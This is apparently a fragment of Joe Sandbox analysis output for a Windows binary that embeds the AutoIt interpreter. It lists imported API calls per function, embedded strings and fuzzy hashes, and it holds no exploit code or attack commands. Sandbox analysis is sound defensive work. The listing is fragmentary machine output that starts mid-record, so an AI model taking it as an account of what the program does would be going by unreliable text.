                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00407A60
                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00407A6B
                                                                                • GetCursorInfo.USER32(?), ref: 00407A7B
                                                                                Similarity
                                                                                • API ID: Cursor$Load$Info
                                                                                • String ID:
                                                                                • API String ID: 2577412497-0
                                                                                • Opcode ID: 1f6d0955f1c33ead8adf781fa44914e6665cc5c2114ffe336088c986207c2f3a
                                                                                • Instruction ID: 7e87b9cd26d4f9f95775bed50ffbcabe0ba05713d37a52458bec0d345c592eed
                                                                                • Opcode Fuzzy Hash: 1f6d0955f1c33ead8adf781fa44914e6665cc5c2114ffe336088c986207c2f3a
                                                                                • Instruction Fuzzy Hash: E23112B0E0831A6ADB109FB68C8995FBEE8FF04750F50453BA50DF7280DA7CA5008FA5
                                                                                APIs
                                                                                  • Part of subcall function 003CE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003BC8B7,?,00002000,?,?,00000000,?,003B419E,?,?,?,0044DC00), ref: 003CE984
                                                                                  • Part of subcall function 003B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B53B1,?,?,003B61FF,?,00000000,00000001,00000000), ref: 003B662F
                                                                                • __wsplitpath.LIBCMT ref: 003BC93E
                                                                                  • Part of subcall function 003D1DFC: __wsplitpath_helper.LIBCMT ref: 003D1E3C
                                                                                • _wcscpy.LIBCMT ref: 003BC953
                                                                                • _wcscat.LIBCMT ref: 003BC968
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003BC978
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003BCABE
                                                                                  • Part of subcall function 003BB337: _wcscpy.LIBCMT ref: 003BB36F
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 2258743419-1018226102
                                                                                • Opcode ID: 5c9ba8842a77236dcd9fcc5cfa73fc862f57fadff2cb98c9ba72d8a8251f2b17
                                                                                • Instruction ID: 7ec620d781dd85287dbdc196ad8af54d8d3c9e2ca45ba01b0357ad38e0b9c9db
                                                                                • Opcode Fuzzy Hash: 5c9ba8842a77236dcd9fcc5cfa73fc862f57fadff2cb98c9ba72d8a8251f2b17
                                                                                • Instruction Fuzzy Hash: 5F12CE715083419FC726EF24C881AAFBBF5BF89304F40491EF6899B252DB34DA49CB56
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0041CEFB
                                                                                • DestroyWindow.USER32(?,?), ref: 0041CF73
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0041CFF4
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0041D016
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041D025
                                                                                • DestroyWindow.USER32(?), ref: 0041D042
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003B0000,00000000), ref: 0041D075
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041D094
                                                                                • GetDesktopWindow.USER32 ref: 0041D0A9
                                                                                • GetWindowRect.USER32(00000000), ref: 0041D0B0
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0041D0C2
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0041D0DA
                                                                                  • Part of subcall function 003CB526: GetWindowLongW.USER32(?,000000EB), ref: 003CB537
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 3877571568-3619404913
                                                                                • Opcode ID: 02ac8ecce551000bc040eb7926f7a99e044b502303f5597294334d216c76b8a0
                                                                                • Instruction ID: ecaa2e2396f3a1236f65be721354b31261de40403b5520b25577f525b140a93d
                                                                                • Opcode Fuzzy Hash: 02ac8ecce551000bc040eb7926f7a99e044b502303f5597294334d216c76b8a0
                                                                                • Instruction Fuzzy Hash: 82719FB4650305AFD721CF28CC85FA67BE5EB88708F14451EF985872A1D778E982CB1A
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0041F37A
                                                                                  • Part of subcall function 0041D7DE: ClientToScreen.USER32(?,?), ref: 0041D807
                                                                                  • Part of subcall function 0041D7DE: GetWindowRect.USER32(?,?), ref: 0041D87D
                                                                                  • Part of subcall function 0041D7DE: PtInRect.USER32(?,?,0041ED5A), ref: 0041D88D
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0041F3E3
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0041F3EE
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0041F411
                                                                                • _wcscat.LIBCMT ref: 0041F441
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0041F458
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0041F471
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0041F488
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0041F4AA
                                                                                • DragFinish.SHELL32(?), ref: 0041F4B1
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0041F59C
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 169749273-3440237614
                                                                                • Opcode ID: 6908ecfd5f75a93bca34b265e2b500f47ba4b6f4a4c3ef5044b8ff6881e2a421
                                                                                • Instruction ID: 4aaa901d1d0b51a1615de76e9e0bef4f3c883d66f11ead2e6e4d75e0b32d2bf3
                                                                                • Opcode Fuzzy Hash: 6908ecfd5f75a93bca34b265e2b500f47ba4b6f4a4c3ef5044b8ff6881e2a421
                                                                                • Instruction Fuzzy Hash: 6E615771508300AFC311EF64DC86E9FBBF8BF88714F004A2EF695961A1DB749A49CB56
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000000), ref: 003FAB3D
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 003FAB46
                                                                                • VariantClear.OLEAUT32(?), ref: 003FAB52
                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003FAC40
                                                                                • __swprintf.LIBCMT ref: 003FAC70
                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 003FAC9C
                                                                                • VariantInit.OLEAUT32(?), ref: 003FAD4D
                                                                                • SysFreeString.OLEAUT32(00000016), ref: 003FADDF
                                                                                • VariantClear.OLEAUT32(?), ref: 003FAE35
                                                                                • VariantClear.OLEAUT32(?), ref: 003FAE44
                                                                                • VariantInit.OLEAUT32(00000000), ref: 003FAE80
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 3730832054-3931177956
                                                                                • Opcode ID: cfb3c696f6b5f99e4c748fde186aa8ccb5626cd47e1b4fb5fc0b286cabdc9a4b
                                                                                • Instruction ID: 8e3cada7451e698d5714d102b367975d37e950c8aca494fd6bb9618d2742c9bb
                                                                                • Opcode Fuzzy Hash: cfb3c696f6b5f99e4c748fde186aa8ccb5626cd47e1b4fb5fc0b286cabdc9a4b
                                                                                • Instruction Fuzzy Hash: 0DD1F3B1A00909DBCF269F65D885BB9B7B9FF04700F258095E609DF690DB74EC40DBA2
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 004171FC
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00417247
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 3974292440-4258414348
                                                                                • Opcode ID: c8d2f65daa75816239579302aaaa35c873a52766a233d0db5bbdc61259a97898
                                                                                • Instruction ID: d2e4180785392da5f7cc79c11513373b7f26258e073dee1303279b7479a9d93b
                                                                                • Opcode Fuzzy Hash: c8d2f65daa75816239579302aaaa35c873a52766a233d0db5bbdc61259a97898
                                                                                • Instruction Fuzzy Hash: BF9141742087019BCB05EF10C451AAEB7A1BF94314F14885EF9965B7A3DB38FD4ACB86
                                                                                APIs
                                                                                • EnumChildWindows.USER32(?,003ECF50), ref: 003ECE90
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumWindows
                                                                                • String ID: 4+F$CLASS$CLASSNN$H+F$INSTANCE$L+F$NAME$P+F$REGEXPCLASS$T+F$TEXT
                                                                                • API String ID: 3555792229-1435497875
                                                                                • Opcode ID: f1214702af29c3260052cdc902345476fb25b66a4e1a96e189c6dd7a2ac3f137
                                                                                • Instruction ID: f22da0ead6af014f194f9d4a8651f28b56947019e6381eb50bf16a802472ab92
                                                                                • Opcode Fuzzy Hash: f1214702af29c3260052cdc902345476fb25b66a4e1a96e189c6dd7a2ac3f137
                                                                                • Instruction Fuzzy Hash: 4091B230610696ABCB1ADF61C482BEEFB74FF44300F50961AD959AB191DF30B95ACB90
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0041E5AB
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0041BEAF), ref: 0041E607
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041E647
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041E68C
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041E6C3
                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0041BEAF), ref: 0041E6CF
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0041E6DF
                                                                                • DestroyIcon.USER32(?,?,?,?,?,0041BEAF), ref: 0041E6EE
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0041E70B
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0041E717
                                                                                  • Part of subcall function 003D0FA7: __wcsicmp_l.LIBCMT ref: 003D1030
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 1212759294-1154884017
                                                                                • Opcode ID: 963731bd3a087a7f21def20489e0ea521d62c7ba0020d71e8bf85650709fc8ad
                                                                                • Instruction ID: 3f38243b454e78c416424d2d6d266fd6a8bf4fdc255ebffee638b812a1eb92e4
                                                                                • Opcode Fuzzy Hash: 963731bd3a087a7f21def20489e0ea521d62c7ba0020d71e8bf85650709fc8ad
                                                                                • Instruction Fuzzy Hash: 4661F371900215FAEB14DF65DC42FFE7BA8BB18B24F504116F911EA1D0EB78E980CB68
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CharLowerBuffW.USER32(?,?), ref: 003FD292
                                                                                • GetDriveTypeW.KERNEL32 ref: 003FD2DF
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FD327
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FD35E
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FD38C
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1148790751-4113822522
                                                                                • Opcode ID: bdc867782381a09386211ff1f808f374b1f290ff823c28375e91958bdba67669
                                                                                • Instruction ID: b09f4f83cd3c3a9f7848771aebcefae98744244b47166e5272c2928613aefc33
                                                                                • Opcode Fuzzy Hash: bdc867782381a09386211ff1f808f374b1f290ff823c28375e91958bdba67669
                                                                                • Instruction Fuzzy Hash: 70514B755043059FC701EF10C881AAEB7F9EF98718F10886DF995AB2A1DB31EE05CB82
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00423973,00000016,0000138C,00000016,?,00000016,0044DDB4,00000000,?), ref: 003F26F1
                                                                                • LoadStringW.USER32(00000000,?,00423973,00000016), ref: 003F26FA
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00423973,00000016,0000138C,00000016,?,00000016,0044DDB4,00000000,?,00000016), ref: 003F271C
                                                                                • LoadStringW.USER32(00000000,?,00423973,00000016), ref: 003F271F
                                                                                • __swprintf.LIBCMT ref: 003F276F
                                                                                • __swprintf.LIBCMT ref: 003F2780
                                                                                • _wprintf.LIBCMT ref: 003F2829
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003F2840
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 618562835-2268648507
                                                                                • Opcode ID: dddb2e5e4816e3e3a9bf40aef8fd3bdca5c1d5edd18262a4e531ca4e40f48081
                                                                                • Instruction ID: 2e9d090220bc7d471b898a1cb0e4adb0a4029e643ef6f62e87c31657c209b3d5
                                                                                • Opcode Fuzzy Hash: dddb2e5e4816e3e3a9bf40aef8fd3bdca5c1d5edd18262a4e531ca4e40f48081
                                                                                • Instruction Fuzzy Hash: 89413C72800219BACF16FBE0DE86EEFB778AF14344F100065F6057A492EA746F49CB61
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003FD0D8
                                                                                • __swprintf.LIBCMT ref: 003FD0FA
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 003FD137
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003FD15C
                                                                                • _memset.LIBCMT ref: 003FD17B
                                                                                • _wcsncpy.LIBCMT ref: 003FD1B7
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003FD1EC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 003FD1F7
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 003FD200
                                                                                • CloseHandle.KERNEL32(00000000), ref: 003FD20A
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 2733774712-3457252023
                                                                                • Opcode ID: 2efdea3757a6ac589f92c090bf3d52873e2f7ced126be3c5545426df31c4d745
                                                                                • Instruction ID: c0d309946639f9fef99b6ecc91b5fbfa4ca323aa6cbe052f37e5062189440180
                                                                                • Opcode Fuzzy Hash: 2efdea3757a6ac589f92c090bf3d52873e2f7ced126be3c5545426df31c4d745
                                                                                • Instruction Fuzzy Hash: D631AFB2900109ABDB22DFA0EC49FEB77BDEF89700F1040B6FA09D6160E770D6448B24
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0041BEF4,?,?), ref: 0041E754
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E76B
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E776
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E783
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0041E78C
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E79B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041E7A4
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E7AB
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0041BEF4,?,?,00000000,?), ref: 0041E7BC
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0043D9BC,?), ref: 0041E7D5
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0041E7E5
                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0041E809
                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0041E834
                                                                                • DeleteObject.GDI32(00000000), ref: 0041E85C
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0041E872
                                                                                Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 27bb1bb2f1e53f69dd0f02dfde591ba242b7ee8fc3d909cde337533dd3507df0
                                                                                • Instruction ID: 188350257d0cc722ec8289b39a9b994d647a203b3a82e7a6d0fbf729e39f86ca
                                                                                • Opcode Fuzzy Hash: 27bb1bb2f1e53f69dd0f02dfde591ba242b7ee8fc3d909cde337533dd3507df0
                                                                                • Instruction Fuzzy Hash: FE413B75A00204FFDB11AF65EC88EAB7BB8EF89715F104069F916D72A0D7349D41DB24
                                                                                APIs
                                                                                • __wsplitpath.LIBCMT ref: 0040076F
                                                                                • _wcscat.LIBCMT ref: 00400787
                                                                                • _wcscat.LIBCMT ref: 00400799
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004007AE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004007C2
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004007DA
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 004007F4
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400806
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                • String ID: *.*
                                                                                • API String ID: 34673085-438819550
                                                                                • Opcode ID: 7857aaeaf04a4f4df38dd0c9fd16863883f3b9a8441652213014440b694806f1
                                                                                • Instruction ID: e3d2bae9049f143a96d7d059acde0a0e589d8919e675b977b34c9dfcfcb5f3a7
                                                                                • Instruction Fuzzy Hash: 3A8180725042419FCB24EF24C445A6FB7E9BB88304F148C3FF889EB391EA39D9558B56
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0041EF3B
                                                                                • GetFocus.USER32 ref: 0041EF4B
                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0041EF56
                                                                                • _memset.LIBCMT ref: 0041F081
                                                                                • GetMenuItemInfoW.USER32 ref: 0041F0AC
                                                                                • GetMenuItemCount.USER32(00000000), ref: 0041F0CC
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0041F0DF
                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0041F113
                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0041F15B
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0041F193
                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0041F1C8
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1296962147-4108050209
                                                                                • Opcode ID: e8c71851e98ab1d87c4a3a47b1fd1f7afa513a621ffc1478a096bbe8ab0b0517
                                                                                • Instruction ID: 9a28ae65580b57a4d4b393ca2fc57f53acebce17472ec8a6acff2814a0bc9369
                                                                                • Instruction Fuzzy Hash: 63819B71508301EFD710CF15D884AABBBE9FB88714F00452EF99897291D734DC8ACB9A
                                                                                APIs
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003EABD7
                                                                                  • Part of subcall function 003EABBB: GetLastError.KERNEL32(?,003EA69F,?,?,?), ref: 003EABE1
                                                                                  • Part of subcall function 003EABBB: GetProcessHeap.KERNEL32(00000008,?,?,003EA69F,?,?,?), ref: 003EABF0
                                                                                  • Part of subcall function 003EABBB: HeapAlloc.KERNEL32(00000000,?,003EA69F,?,?,?), ref: 003EABF7
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003EAC0E
                                                                                  • Part of subcall function 003EAC56: GetProcessHeap.KERNEL32(00000008,003EA6B5,00000000,00000000,?,003EA6B5,?), ref: 003EAC62
                                                                                  • Part of subcall function 003EAC56: HeapAlloc.KERNEL32(00000000,?,003EA6B5,?), ref: 003EAC69
                                                                                  • Part of subcall function 003EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003EA6B5,?), ref: 003EAC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003EA8CB
                                                                                • _memset.LIBCMT ref: 003EA8E0
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003EA8FF
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA910
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 003EA94D
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003EA969
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA986
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003EA995
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 003EA99C
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003EA9BD
                                                                                • CopySid.ADVAPI32(00000000), ref: 003EA9C4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003EA9F5
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003EAA1B
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003EAA2F
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: 39b4f0bfbea7f71f1cad108f473961e2539fc3ddbe16753966e75a5ff4800dd8
